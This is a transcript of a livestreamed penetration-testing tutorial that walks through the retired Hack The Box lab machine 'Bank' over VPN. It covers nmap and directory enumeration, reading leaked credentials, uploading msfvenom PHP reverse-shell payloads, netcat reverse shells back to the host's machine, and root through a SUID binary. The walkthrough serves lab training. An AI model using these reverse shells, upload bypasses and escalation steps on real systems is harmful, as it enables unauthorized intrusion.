Welcome back, everybody. It's me, Cyber Warrior, and this is Tech Tuesday. So, as you all know, for those who are just tuning in, and for those that have been following for the past couple weeks, we have been going over ParrotSec and everything from a little bit of Metasploit and how to set that up, some Linux basics. Oh God, what else? A few other things. But today, we're going to do something a little different. Today, we're actually going to work on enumeration and actually go through a retired hack-the-box machine called Bank. And the beauty of this, and the reason why I'm choosing this one, is because this one is all about enumeration. So everything you do is about, how you evaluate a system, how you go through and look ports, look for files, things of that nature. So that's what we're going to do today. And hopefully, with your assistance, we'll be able to dig in a little deeper than just flying through it. So, first and foremost, let's log into our ParrotSec instance. So here we are. All right, so we're logged in as usual. And I currently have a terminal. Now, before I get started, one of the things I wanted to show you is hack the box, right? So we're here. We're offline because I don't have the VPN set up yet. But as always, you need a VPN to download and get into this box, or any of their boxes for that matter. So I'm going to show you that. So what I've already done is I've set it up to where if I go to sudo su, all right, I have a box here called HTB, so for hack the box. So if I go into there, clear my screen, and let's make this a little bigger for you guys. Now in here, I have a ton of things that I've been working on over the course of, a while. So what I want though is this file right here that I downloaded from Hack the Box called lab cybersoldier18.ovpn, because cybersoldier18 is my name on Hack the Box. So this was before I adopted Cyber Warrior as my handle. So in order to run this, we do ovpn / lab _ cyber soldier 18, and we run. Oops. Open VPN. Apologies. / lab. Nope. So the thing about Open VPN and the way it's configured right now out the box in the standard shell is tab completion does not work when you're using Open VPN. Why? I don't know. But that's okay. So we go ahead. Why? Oh, helps if I put the name in right. And my number block ain't on. Open. There we go. And we're good. All right. So you see initialization sequence completed. We're good to go. We're logged in. So I'm going to come over here. Clear. And I have in here an enumeration directory. So ls. Bunch of other stuff too. But I have an enumeration directory because that's where I will put all my enumeration scripts like linps, lse, letinum, winps, and then anything else like auto recon will be in /opt. But the ones that I transfer to and from different different machines, so things like letinum will go into that enumeration directory. So if I go into it right now, you will see I have lse.sh because that's what I'm going to use this video, right? we're going after a Linux box. We're going to use LSE, which is fine for us because when you consider how this all works, every enumeration script works just a little bit different in how it displays information And LSE will allow us to step through and look at different results. So that's what we're going to go with. Now, first and foremost, what we need is we need the IP of this wonderful box. So like I said, we're doing bank. So let's go back to, not there, here. And we're going to say bank information. All right. And yes, I'm online. Can you please have access? All right. Oh, let's spawn this machine. I did not do that yet. So we're going to spawn it and get it up. And where is the information? Come on. So how's everybody doing tonight? You having fun? Have a good day? It's Tuesday, so, you know. All right, there we go. Now it's up. It's running. We have our IP address, which is 10.10.10.29. So, in order for us to go after this machine, we go back here, go here. And we're like, all right. So, the first thing you do anytime you look at a machine is, me personally, I run Nmap. So, for things of that nature, there's several ways you can go about doing it. The quickest way, and it's a quick port scan, is to just run nmap dash nmap no ports. Now, if you were going after, if you wanted to see all services and things like that, and how you doing, Rain? We can put that in, right? We can do our service detections. We can do our service versions. There's a lot we can do. But you can do a quick scan just by hitting nmap 10.10.10.29. The downside to this is it's not verbose. It's not going to step through if it's running any enumeration scripts or NSE scripts. It's not going to do service version detection or anything along those lines. But it'll give you a quick output of if there is anything running on those top 1,000 ports. And as you see here, we do. We have 3 different services running. We have port 22 for SSH, port 53, and port 80. So if you're going to dig deeper into any one of these, you can go through and do a service version detection. So what I like to do, and it's a script, a way that I run it. So if you have a different way of doing things, by all means, go ahead, share, let us know. But I do SC, SV, and we'll do -P. So we're just going to target those 3 ports just because we know that's what's there. So 22, 53, 80. So it still makes our scans quick, but we're able to come up with everything. And then we're going to do -O, I believe it is. I hate trying to remember all the options for this. And then finally, I like to output everything. So we're going to do -OA. So it's all results. And actually, while I'm here, let's do File, New Tab. I'll go back, and we're going to do Make Dir Bank. There we go. So then I can do here, bank, and we're going to call it nmap quick. There we go. So it's going to output all formats. Oops. So as you see here, it requires root privileges to do OS scanning for TCP/IP fingerprinting, which is fine. So you just do, you know what, we're going to make this easy. So we're going to do sudo su, and we're just going to run all of our scripts from root. Then we don't have this issue no more. Nmap sc sv o whoops o -p 22 53 80 OA, and we're gonna say, since I'm logged on as root and that's not where it's at, we're just gonna do that, and we're gonna call it nmap quick. Oh, it helps if I put an actual IP address there, wouldn't it? 29. Now it'll work. Once again, I forgot to do verbose. I hate that I forgot that. I 9 times out of 10, I get this. I forgot to do it this time. I'll normally do a verbose scan. So actually, you know what? Screw it. We're just gonna cancel this. Clear. Hit up. And we're going to come here and do -VB. So, very verbose. There we go. Now we can see everything it's doing. So, we're still outputting all the files. We're still doing everything like that. But now we're actually going to see every step of the way where it's at in its scan. All right. Awesome. So it's done. So we have 2 ways we could do this, right? So the first way is to scroll up here and we can go through and look at the results. So we see here we have an open SSH server. So open SSH 6.6.1 from Ubuntu. Then we have a bind, so a DNS server, and then port 80, which is Apache, and it's running version 247. And it's running the default Apache page. It works. So this title, Apache 2, tells us that if we go to that website right now, which we'll do. So let's go. We'll just pull this one open. Come on, work, be a peach. And we go here. And we say 10, 10, 10, 29. On port 80, we see the default web page. Which, in a real environment, I like seeing this if I'm going after a corporate network, because a lot of times if there's a web server that's never been configured, there's a high probability there's going to be default settings on there in other places. So having the ability to go through and look at this and see a default page lets us know that we can do other things. Or at least look for other places. So, moving on, since we know that's there, the next thing we would do, we're like, all right, well, we have a web server, and we have SSH. So, what would be, for those in chat, what would be the first thing you would think of to look for or want to look up in terms of the services we saw? So SSH with an open SSH version of, where'd it go? 6.6.1. A DNS server on Ubuntu running bind 995. Or the web server, Apache, running 2.4.7. So if you were going to do anything next and you see a default web page, what would be the next thing you think of doing? Okay, checking if there's a default password. It's one way. Any other ideas? Dirtbuster. All right, anybody else? So we've got default passwords for a login. We've got Dirtbuster. Is there anyone on YouTube or Twitch with any other ideas? Scan the directory. All right, so the same thing as Dirtbuster, right? We're going to scan the 10.10.10.29 directories to see what else we find. All right, so those seem to be the common. All right, well, you're right. For me, the first thing I'll do, because if I'm gonna try default creds, and I know it's running Apache, I want to see what other directories are there, right? I want to see if it's hiding something, because if a web server is enabled, that could mean that there is a deeper directory there that they have exposed for one reason or another to the web. They may not intentionally have it exposed, but it's possible, right? Sometimes we get lazy as system administrators, or think, oh, security through obscurity, or no one's going to look here, or whatever the case may be. A lot of times there are directories out there that they think can't be found. So there are a few different tools you can use. let's see what Parrot has built in for us. So we're going to clear, and we're going to say, see if Dirtbuster's here, because that's what somebody mentioned, so we're just going to try to run it. All right, and we get Dirtbuster. So our target URL is going to be HTTP 10.10.10.29. And we'll tell it port 80 just because that's what's listed in example, although you don't necessarily need that. And then we're going to browse for the list, which if we go here and I apologize, I got to try to remember where the folder is at. I believe there's one in Dirtbuster, although there are others that I believe we downloaded, but we're going to check here. Word list and directory list, lowercase, medium. We're going to use that one. Select list, and we're going to tell it to be recursive, brute force directories, files, whatever. Start with root directory and file extension. We don't necessarily need one, but we're going to hit start. We're going to see what we find. So as you can see, because I ran this from the CLI, from the terminal, we're seeing what it finds on the terminal itself and, of course, in the graphical interface. So we're going to give it a little bit of time. We already got a 403, so I believe, if memory recalls, that is a authentication error. Lurk, NTLM, if I'm not mistaken, is only Windows. Apologies, I just looked at that message. I could be wrong, though. So while this is going, what other questions or anything else you guys got, man? I mean, we're just in the beginning of this, so we're not too incredibly far in. But do you have any questions, or do you have any other methods that you tend to use when you look at things like Nmap and things like that? Because this is part of learning. So if I miss something, I'd love for you guys to chime in and let me know. Or if you have a different method for, or a different way of thinking, it's something that I can evaluate, or anybody else in the chat can evaluate. As far as how they would do it. Okay, so DNS hook lookup on port 53. Do I like Go Buster? Yes and no. It has its perks. It has some good things about it. However, I tend to I'll use GoBuster in some automated scripts that I use on occasion. I'm just not using those today. Other than that, I normally use Dirb. I'm only using Dirtbuster today because that was the one that was suggested in Twitch. But 9 times out of 10, you'll see me use the original brute forcer that I was brought up on, and that's Dirb. DIRB. And that's what it is. It's just a Dirtbuster. It's just a brute forcer. I just like its, what is it? I like its generic word list that it uses. DNS lookup using dig on port 53 fast byte. Let's see. All right, so while that's running, so let's move this down here and clear. So what we're saying, dig, what is it? What What do we have? Root servers, VeriSign. Nothing really promising. So let's see. So you said speed up. All right. So let's do that. Oops. I didn't want to do that. Current number of threads. We'll say 15. Change. Back. Whoops. Where's my number of threads? 15. There we go. Start. Hopefully this don't crash my system. Or theirs, for that matter. But alright, so we're running 200 threads. So that should speed up the search a little bit. What else, man? So you said dig. So you said do a dig on their DNS, right? So what else would you look at? If you're looking at dig on that, what else would be something you would look for? Any ideas? Going once. That's true, FastBite. It does. So, and it's not Etsy source, it should be your Etsy host file because it's your DNS file. So if I go here, and I'll probably get the same result, but we'll take that suggestion. So if I go to, let's do sudo su, and we're gonna say clear cat Etsy host. All right, there it is. So we're gonna do vi Etsy host. We're gonna come down here, and we're gonna say enter, whoops, back here, enter, hashtag HTB machines, and we'll say 10, oops, give me there we go, and 29, and over, and we're gonna say bank.htb, right? So we're just gonna take a shot in the dark. And then we'll go back. Do we got anything else here? Not yet. I know what we're supposed to find. So we're going to do bank.htb and see what happens. Nothing. Yeah, take me there. For some reason it did a Google search instead of taking me to where I wanted to go. And we've got somewhere. So we have a login page. Now, mind you, we're still looking for directories. So we may find something in that directory, but let's do it this way, right? So let's adjust our dirbuster. Because maybe because we're going by IP and not HTB Bank, we're not finding what we want. So we're stopping this. Let's go back here. We're going to go back. And instead of having the IP, because like you said, Hack-the-Box has a tendency to do this. We're going to do bank.htb. And then we're going to start that. Oh, my Jeezers. Right? So now we're actually getting somewhere. Now we're getting all the files. Because now we're looking at it from a DNS. From the name server. And it's actually finding what it couldn't find via IP. And yes, there's networking and administrative reasons behind that. We're not going to go into it, but be that as it may, the other way we could find it, I believe, if I remember correctly, host 2929, didn't get nothing. How How would I get this name? Dig A. No, I want. How would I? Can't remember how to get that. There's a way to get that name. Can't remember off the top of my head. So hopefully we find what we need in less time. It's not showing any files. Find a lot more this way. So many files. Alright, so while we're there. So, one of the ways you can go about this, we don't have an email address. So we could say admin password. Let's see what the error is that we get. Alright, so the credentials are not matching our record. Alright. If we had a valid account, we could see what that shows. And again, I'm just doing this until Dirbuster finishes to see if maybe there's something there. And like I said, I know there's going to be something in Dirbuster. I already know. But we're going to take a look at this. So is there anything here that might show something? I'm not seeing anything. So what do you think, guys? Is there anything in this source file that might have some information for us? SQL injection? Okay. That's not viable in this there, but alright, so let's see. Will anything change? So, how does this information get sent? So we go here, and we say we want... I hope I got Foxy Proxy here. Let's find out. Let's see if my extensions have what I need. Add-ons. Let's search. Nope, I don't have it. So we're going to do Foxy Proxy. Burp Suite Community Edition. God, can you please find what I need? Alright, so Foxy Proxy Standard. Yeah, okay. Add to Firefox. I love Foxy Proxy. It's like my saving grace when doing things like this. So we're going to add. You know what? I got a better idea for this. Where's what I want? Let's already start. Errors, result, scan. What's going on? What's my window here? Stop. I don't want to find files. No, I don't want to improve. I don't want to find files at all. Let's be honest. I don't. We don't want to brute force files. We just want directories. That's all we need. So let's do that. Hopefully that goes a little quicker. Since we're not looking for files, we're just looking for directories at this point. Employee. So we got an uploads directory. So that's promising. See what else we find. while we're doing this. Start burp. Okay, got it. Close, close, close. All right, so now we're going to set up our proxy. Options. Add. HTB Bank. And we want bank.htb. Or no, proxy IP address 127.0.1. Where's my dashboard? Where you at? Burp. No, it's not what I want. Did I change this? Proxy. Intercept is on. Blah, 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 blah. Proxy options. Oh, come on. Load. Damn you. What is going on? Come on. Load the documentation, please. While we're still waiting on this. How do I... Oh, 8080. That's what the default is. I don't remember offhand. So, port 8080. And save. Patterns. No, we want... Pattern. We're just going to call this pattern bank. Bank. Pattern. HTB dot... Oh, no. Bank.htb/star. Type wildcard enabled. Okay. Save. Oh, I can't put the wildcard in there. There we go. Oh, no slash. Alright, save. Alright, cool. So we go here. And while we're still waiting on that, intercept is on. Alright, cool. So let's see. We're going to say admin password. Don't save. Oh, helps if we turn it on. Admin password. Hey, there we go. So now we can see. So we have an input email, input password, submit query. So if we wanted to test this, we can come here and we can just change this just for shits and giggles. Just gonna put a single quote in. Forward. And what happens? Let's find out. Nada. Alright, so let's try it again. So let's do admin. No errors or anything. Password. And let's do it here. Just put a single quote in. Just see if it breaks anything. Come on, find what I'm looking for. It's taking a while. What's it called? So, being that I know what I'm looking for, let's see if I'm using the right word list. Because it's kind of aggravating me that it's not finding it. CD/user shared or buster word list class grep balance. Oops. Cat directory list. Load. Come on, why aren't you working? 3. Oh, helps if I type it in right. Directory end. Medium. And we're gonna grab right? Oh, balance transfer. All right, so it's there. So we're using the right word list. Just taking longer to find it than it should be. But that's okay. So let's say we're still looking for SQLI, right? Possible. So let's do this. So let's go back and turn off recursive. And just start. Because it really depends on where that directory falls, or that word list item falls in the word list. Because if it's near the end, then until it gets to that point, you're never going to find it. So failing this, so we've said SQLI. That's one way that we can look at it as a possibility. I know that's not the right way. I know it's not even listed as a way. But uploads looks interesting. Correct, Alan. Uploads definitely looks interesting. So we may end up there. I'm not going to give it all away, but we may end up there. We got server status now. Like I said, I know the directory we're looking for. But the whole point of this is to actually have it show us that directory. So we got a minute left. Minute 20. My time keeps changing. And if you were doing this on your own, honestly, me personally, I'd let it run. I would turn off the high speed. I would get rid of the 200. And I would have done, like Fastbyte said, disable recursive scanning. But I'd lower it. I'd go maybe 15 at a time, 10 at a time. But as I'm the only one on this box, it's highly unlikely I'm going to crash it by throwing too much data at it anyways. But while we're waiting, so we said we have uploads, right? So let's close out of Foxy Proxy. I don't need that right now. Or not Foxy Proxy, Bert. We're going to turn this off. Hey, there's balance transfer. We have a directory. All right, cool. So let's see where that takes us. So instead of view source, we're going to leave that login page there, just because. And we're just going to go to balance transfer. See what that does for us. And we can get to it. So we can get to a balance transfer page. Interesting. So when we look at something like this, we see everything is the same size. And they're all ACC files. So we go through. All right. So we're seeing a lot of 584s, 585s. So let's go through and click one. Let's just see what this shows. All right. So user account, full name, looks encrypted. Email looks encrypted. Password's encrypted. Tells us the number of credit cards, transactions, and the balance. All right. Well, that ain't what you want to see. So we don't know what encryption mechanism or method they're using. We can go online. We can try CyberChef or any number of ways to find it. But what other options do we have? Well, let's see. Do we have... Where is it? Do we have any other giveaways as to what might be how we figure out or find our way in? So let's go up here. And, oh, wait. I just seen something. Let's see. There we go. So let me... Can you guys see this all right? I'm going to zoom in a little bit. So what do we have here? We have a 257. Alright, so why would that be less? So let's go to 257. See this one. Oh, so this one, even though the encryption failed, it still saved the file. Alright. So we now have a login and password. So I could go to here. So Chris at bank.htb. We're just going to copy this password. So we're going to say Chris at bank.htb and Control V. We're going to log in. I'll save. Alright. So we're logged into here. Holy jeez. Let's see what options we have. What can we do from this fun little page? Well, that does nothing. What's support do? Alright, so support, it looks like we can send a message. And we can choose a file and upload a file. Alright. So, if we can upload a file, guess what we're going to do? We're going to go here. And we're going to take this. Control C. We're going to go here. HTTP. Control V. Oops. Copied it over already. And since Alan pointed out uploads, let's go to uploads. See what we got. We don't have permissions. Oh no. So let's go back to support. So we have this. But let's see what kind of, I don't know, what might be here. So we get alerts. Keep in mind, people do put comments that, well, can be kind of stupid in their HTML code. Wait. What do we have here? So let's zoom in. Debug. I added the file extension .htb to execute as PHP for debugging purposes only. And input file, do we see where it drops it at? Let's see. File to upload. Upload file info to a fake path. But it's an upload. So we're going to say, take a shot in the dark and say it uploads to, well, uploads. That would be what I think, right? So what we're going to do is we're going to upload a file to them. Why? Because, well, it's fun. So in order to do that, we're going to do MSF Venom. We're going to say payload PHP, since it is a PHP file that we're creating. Interpreter. Can definitely upload something. And we're going to say reverse TCP lhost equals, well, what is my host? That's OpenVPN here. Ah, we stopped. All right, cool. So let's close this. We already know what we got from here. IP config. Oh, crap. IF config. Stupid Windows. And we want to come back to, here's our tunnel, 10.10.14.16. All right. 10.10.14.16. And L port equals, I like to be a little different. So we're going to say 443. And then we're going to do format is raw. And we're going to send that to bank.htb. Oops. Cyber. bank, and we're going to call it bank.htb. Cool. All right. So let that generate. So we're going to initiate a reverse shell via interpreter. Cool. That sounds like a plan. I like that idea. All right. So let's do, we have it. So if I do ls home, oops, let's just do cd home cyber bank ls cat bank. All right, so there is our PHP reverse shell. Awesome. So next we're gonna do we're gonna use the form. Let's go to the form. Why not? It says we can. So we're gonna say title pwned, just for fun. Actually, yeah, pwned. You have been pwned. We're gonna give this a shot. See if it happens. Choose file, and we're gonna go cyber, and where's bank? Bank. There it is. Bank. Bank.htb. And did it go? We're gonna submit. Let's see if it's there. Hey. And then we're gonna do MSF console. Because keep in mind, with this being a interpreter show, if I didn't have any handler or any listener set up, I would just die. Wouldn't matter. So we're gonna use exploit multi-handler. And then we're gonna say, right? Wait, use exploit handler. Does that work? No. Okay, cool. Options. Set lhost 1010. Oops. 10 14 16. Set L port 443, and we're gonna say run, or no, exploit. So it should start listening. There we go. So we're listening, and then let's click here to see the page. Oh. We have a shell. So we could sit here, and we gotta wait for interpreter. Ah, it died. It died. Why did we die? What happened? Could be the port. That's possible. Let's try to reload it. So we see it's getting through, but something about this connection isn't allowing interpreter to work. Why? Because if I hit enter, it's going to die. We don't want it to die. Dying is bad. But it closes. Alright. So, use exploit. No, we don't want to do that. HA. Try a different shell. Alright, let's do that. So, let's open up another one. Alright. Sudo su. And do I have... Nope. So we're going to do MSF Venom. No, we're going to do a... So we could do a different shell. Make things a little more interesting. But we're going to do it. So we're going to use PHP... Oops. Dash P... PHP... won't work. Tab is not working. Alright. So let's go here. Let's say Metasploit P or MSF Venom. F Venom. PHP payloads. So, no, we don't want Windows. Stage payloads. No, because we need it to be a PHP one. Windows, Java, Java. So, there's reverse PHP. Did we have... Let's give that a shot. See if that works. So we do interpreter, meter, reverse, TCP, right? All right, cool. And we do lhost equals 10, 10, 14, 16. Port equals, we're gonna switch it up. Let's do 5555. And then let's do -f raw, and we're gonna send this to bank and call this bank2.htb. All right, let's give this one a shot. So we're gonna go back here. So options. Oops. Options. Set L port 555. I'm gonna say exploit. And then we're gonna go back here, right? Yeah. Here. I'm gonna go to support. What's going on, Devil Ray? Glad to have you here. Pwned 2. Pwned 2. Choose file. Come on, choose file. You know you want me to. There we go. All right, bank 2. So we're gonna try that one. And we're gonna submit. And we're gonna click here. Didn't like that one either. So we've got to use a non-interpreter based shell. From the looks of it. Which is fine. I just realized, Devil Ray, I'm on infinite logins page. So let's do a non-interpreter payload. And then I'm going to just use NCAT. So PHP, reverse PHP. All right, so let's give that one a shot. So let's go up. PHP. Right, he would be. I looked at the logo and just happened to see it. And instead of 5555, you know what, we're gonna be funny and just use leet, and we're gonna call this one bank 3, and we're gonna say enter. All right, and we're gonna do nc-lvnp 1337. Yeah, it's still not working. It's gonna die. That's fine. All right. Test 3. Choose file. Bank 3. Open. Submit. Click here. Let's go over here. All right, so we have a shell. Who am I? Haha! All right. We have ourselves a shell. We have ourselves a shell. But we're only www data, right? That's all we are. So we're going to let this die. Where are you at? Enter. Who am I? Clear. Exit. Abort session. Yeah, because you're taking forever. So, exit. We're going to do this a different way. Clear. And we're going to do cd // enumeration, and we're gonna do Python -m. Oops, no. Python 3-m http.server, and we're gonna say 80. All right, so in netcat, we're gonna do. We're gonna come here. Let's see if infinite logons has what we want, right? Oh, we lost our shell. No. Let's get that back. Reload. Without paying money, it's good. I still like, you know. All right, wget HTTP 10.14.16/lse.sh. Let's hope that works. ls. There it is. Chmod plus x lse.sh /lse.sh. Oh, it's not gonna work. I don't have an elevated shell. So, see if he has what I need. On the server, remove web shells? Maybe, but they're all there. Let's see. Elevate shell with Python. So I could do Python -c. There we go. That's what I want. So that's one of them. Import pty.spawn. Then bash. I didn't like it either. Oh, LSE was still running. Hot. See, we didn't have it. But now we have a shell. So we see it. So we're www data. We ran LSE. Sudo. Can we sudo without a password? Nope. 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 The most used one-liner in Hack the Box. Which one? The Python one? That Python -c? I love that one. It's been a while since I did Hack the Box though, so I completely forgot. We have binaries with set UID bit. Nice. So let's do this. All right. Let's take a look. And let's do /lse.sh, and let's do help. If it wants to show us that. Doesn't look like it wants to. All right, so we're going to try something here. So let's do this. Control Z, right? Should background it, yeah. Hopefully it didn't kill it. STTY raw echo, and then FG. Enter, enter, enter. Okay. Echo. Oh, I froze my screen. What happened? No. All right. Dang it. All right, let's try this again. I hate when things don't go right. Sudo su, and then we're gonna do nc lemp 137, and here stop reload. Alright. LS. There it is. I've never used RL wrap, even though people keep telling me to use it. I don't know why. Let's go back to lse.sh. Don't run. I know there's a way to get a better shell from here, and it's being stupid and won't let me. And it's aggravating. Like, if I copy, paste, enter, that isn't gonna work. And that does nothing. Which NC? It's still running LSE, so I'm not gonna be able to see what I want. But we know we have a SUID binary somewhere, right? We saw that. Alright. PWD. Man, this really doesn't like it. Close. Yeah, no, let's not close it yet, because then we can see this. So, where did it go? Where's what we're looking for? File system. So we know there's binaries with the SUID or set UID bit. So now let's close it. Yes. See if that ever finishes. So let's do this. Let's leave that open, and we're gonna say, all right, using LSE. Just because I can't remember for the life of me. We timed out. That's not what you want. I'm not getting shit. So we lost something. There it goes. Alright. I can't even print working directory. Using lse.sh. Let's go here. Alright, that at least works. And since we have LSE there, we just want, so we're going to do level selection, so file system, so -sfst. Alright. So we want /lse. Actually, let's try to get our shell. Python -c import pty pty.spawn bin sh. Nothing. Because you suck at life. Python 3? Let's try that. Elevate shell with Python 3. Because I don't remember the exact command. Alright, so we have limited shell. Okay, where's the Python 3 command? Let's try that. Which Python? User bin Python. So Python 2 is there. But let's do Python -c import. Maybe that's what we need. Spawn bin bash here. Nope. Python. Can't even do that. Who am I? Oh, everything's freezing now. Awesome. Awesome. we need to get another shell. So let's come here and cd ls, cd back. No, we want it here. Copy bin nc to here. ls. All right, cool. So now from here, I should be able to reload this shell. All right, and then we do no space between spawn and open. All right, so we get HTTP no 10.14.16/nc. Did that work? Yes, it did. So now, just to be safe, nc-lvnp 443. Permission denied because I'm not sudo. Sudo su. All right. nc-lvnp 3. All right, and then we do ls. All right, /nc. Yeah, nc. -e bin sh. Nope, bash 10.10.14.16.443. See if that worked. Nope. Why can't I remember how to do that? NC reverse shell. So if we do no space between spawn and parentheses, we could try. Well, let's make sure whoami works. All right, so python-c import pty.spawn bin bash. Nope, still doesn't give me my shell. Wants to be a pain in the ass. Yeah, I know. Oh, okay, so let's do it that way. See if that works. NC 14.16.443 -e bin bash. Right? That should work. Alright, cool. No, that. Chmod +x nc /nc. It does not like that at all. Then again, I lost my connection again. Ah! Oh, you suck. See if this will let me execute. Oops. Well, let's try this one. Dang it. Python-c import pty spawn bin bash. There. Nope. All right. Who am I? Oops. Who am I? Nothing. Nothing. So it seems once I do that Python, it kills my shell, which is fine. We could just do chmod +x nc /nc 10.10.14.16.3 bin bash. See if that works. No, I'm not allowed out on that port. All right. So that 1, 2, 4. /nc 10.10.14.16.5 -e bin bash. Nope. Who am I? All right, that still works. NC There we go. All right. So we have another shell. Hopefully this one don't die on us. That's right. So moving on. Let's do ./lse.sh. Oh, we can try to do it this way. Python. Actually, yeah. Python-c import pty.spawn. Actually, let's see what shells are here. Bash shi ls bin ls. All right, cool. So what do we have? We have sh. Do we have bash? Yes, we do. All right, so either one of these should work. Python-c. I don't know. -- version. Why does that not work? All right. Who am I? Still get that. All right. So we need to find this bit. So we're just gonna do it this way. ./lse.sh. Where are we? Not netcat, not that one. GitHub -l1 -s fst. Hopefully that works. See what kicks back. That's fine, so there's nothing I can do about that. Did we do that right? Oh, we could do that. So let's see. Bash. How did he do it? I didn't even think of that. See, you learn something new every day. Cancel. LSC, or no, lse.sh-i. Nothing. That did nothing for me. Level 2, level 1. So we want the level 1 sample for file system. And it's not showing it. Okay, that's fine. Who am I? So it's still showing. So why will LSE not work right now? This is aggravating me, people. I hate when things don't work the way they're supposed to. Let's do this. MSF console. Use exploit. Multi-handler. Direct the input to std out. So we could do lse.sh-l1 output to -sfst output to lse.txt. What's going on, Rocky? Oh, that ain't gonna work. Crap, I lost my directories. Oh, and since I'm in netcat, I can't even see it. Oh, cd var ls CD www ls CD bank uploads s. All right, there we are. So ./lse.sh-l1-s fstp. All right. Might just be FST. Yeah, it's just FST. And output to bank.txt. Still running. Hopefully it doesn't die. I'm sure I'll see it, but hopefully it doesn't die. So we're gonna let that go. And while that's going, I'm gonna use this. Show options. We're gonna try to load one more page. Set outhost 6. Set out port 555. And where's my MSF Venom? I don't need this right now. Do I have MSF Venom here? Yeah. Alright. And there. Okay. And we're going to call this 4. It's taking longer than it should. I hate when shit doesn't work right. There we go. Cat bank.txt. Hey, we got the file system ones. What do we have? No. Where's my set UID ones? No. Hey, here we go. So we have an uncommon set UID binary. var HTB bin emergency. Alright, so let's do cd var HTB bin ls cat emergency. Let's see if that tells us anything. Nope. So let's just do /emergency. Don't know what happened. Who am I? Well, guess what? We have root. We have root. We really have root. So it's a learning process. Some of the things did not work as planned. All right, fast bite. So I want a little quick at that end, right? So without the actual shell that I wanted, which I'm going to try one more time here, it was very hard to see permissions and what was going on. But essentially, if I go... Actually, let's just do here, lsshla. Emergency has the set UID bit set, and it's a root file. So whoever executes it, which everybody can execute it, it'll execute as root. Now we can't see what the file does, but if I do because I did /emergency, it ran as root and immediately dropped me into a root shell. Again, I had no clue what the file does. So when you see things like that, you can just execute the file and see what happens, because it's going to run as root. Sometimes you'll get an output, sometimes you won't. But I literally ran emergency, did a who am I, and I am now root. So I can go cd root ls, cd root ls, and if I wanted to, I could do root.txt. I'm not going to, but I could. So saying that, do you have any questions before I go? It's already 10:20. It's later than I normally want to be on. But do you have any final questions? And then I'm going to get rolling for the night. And I will be back Friday for Security Happy Hour. Any questions on how I found that? An explanation of what a set how I found set UID. Security Happy Hour is more interview style. So I usually bring on 1, 2, 3 guests, sometimes more, sometimes less. And, well, not really less than one. It's always at least one guest. And we talk about what's going on in cybersecurity, backgrounds, where they come from, what they were doing, how they're helping the community, or whatever is most prevalent in cybersecurity at that time. And it's all about getting new people out there, right? That's the beauty of Security Happy Hour, is it's all about getting new people seen. No, Chad, I found, so it's one way you can find it is using find. I used a Linux enumeration script called LSE, which basically runs all that stuff, but it's a script that does everything for you. So I don't have to do each check individually. It'll do it on its own. So I used lse.sh, and that is right here. So it is this GitHub, Linux Smart Enumeration by Diego Tretos. The other ones out there are linenum and linpeas. Any of them could have found something, could have found it. There you go, Fastbite. Thank you. But other than that, look, make sure you all tune in for Security Happy Hour this Friday. Come with your drinks, your talk, your chat, everything. I love having you guys on, every last one of you. I'm surprised I haven't seen the Panda Gang tonight, but that's okay. I actually had FOMAT on this past Friday. So I'm looking forward to it this week. I'm going to reach out to a few people. If you want to get on the show, go to CyberWarriorStudios.com. Up in the top right-hand corner, you'll see a menu for show request. That is how you can request to be on Security Happy Hour. And again, I take everybody. You can be a student. And if you check out Fridays, I did actually have a student on. All the way up to somebody who's been in cybersecurity and IT in the industry for years. Doesn't matter to me. I'm all about getting your face out there, getting you heard, and letting people know how you feel. So this has been Tech Tuesday, and I am extremely grateful for all of you. I'm glad to have had you here. I'm glad you tuned in. If you have any more questions, reach out to me on Twitter. Leave some comments on YouTube or Twitch. The chat room's always open. So here, I'll send it to you real quick, Chad. Go to my website, man, CyberWarriorStudios.com. Let's throw that in YouTube also. So, in case you're wondering, man, there's a lot of things coming to Cyber Warrior Studios. Devil Ray Pen Testing has a playlist that he is going to drop his first video. Devil Ray, I think that's the 24th, if I'm not mistaken. I got another guy that's going to be doing security basics, basically for noobs, and just basic and your general user. So I got that coming. We got other people coming down the line that are going to be putting videos up on YouTube, and possibly Twitch if they decide to go live. So that'll be great. So if you don't see anything other than myself on Twitch, please drop on over to the YouTube channel where you will see all the new playlists and everything that's coming. Other than that, it has been a fantastic evening talking to you guys, working through this with you all. If you have any way to support, share the video, subscribe, follow, everything like that. And also, you can also support me on patreon.com/CyberWarriorStudios. You can support me on Buy Me a Beer, Buy Me a Coffee /CyberWarrior. And I think that's about it. I got GoFundMe and a few others. But at the end of the day, it's all about helping out the community. So if you can, you can. If you can't, you can't. I'm still going to be here. Still going to be supporting you all and helping you every chance I get. Saying that, I love you. And I hope you have an enjoyable evening and an enjoyable rest of your week. And I will see you all on Friday.